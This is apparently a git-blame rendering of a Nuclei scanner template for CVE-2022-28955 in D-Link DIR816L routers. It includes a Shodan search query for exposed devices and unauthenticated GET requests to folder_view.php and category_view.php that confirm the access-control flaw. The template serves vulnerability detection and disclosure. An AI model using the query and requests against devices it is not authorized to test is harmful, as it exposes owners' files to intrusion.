2022-08-14 14:56:22 +00:00
|
|
|
id: CVE-2022-28955
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: D-Link DIR816L - Access Control
|
|
|
|
author: arafatansari
|
|
|
|
severity: medium
|
|
|
|
description: |
|
|
|
|
An access control issue in D-Link DIR816L_FW206b01 allows unauthenticated attackers to access folders folder_view.php and category_view.php.
|
|
|
|
reference:
|
|
|
|
- https://github.com/shijin0925/IOT/blob/master/DIR816/1.md
|
2022-08-14 15:02:02 +00:00
|
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28955
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-28955
|
2022-08-14 14:56:22 +00:00
|
|
|
metadata:
|
|
|
|
shodan-query: http.html:"DIR-816L"
|
|
|
|
verified: "true"
|
2022-08-14 14:58:04 +00:00
|
|
|
tags: cve,cve2022,dlink
|
2022-08-14 14:56:22 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
GET /category_view.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
- |
|
|
|
|
GET /folder_view.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
redirects: true
|
|
|
|
max-redirects: 2
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- '<title>SharePort Web Access</title>'
|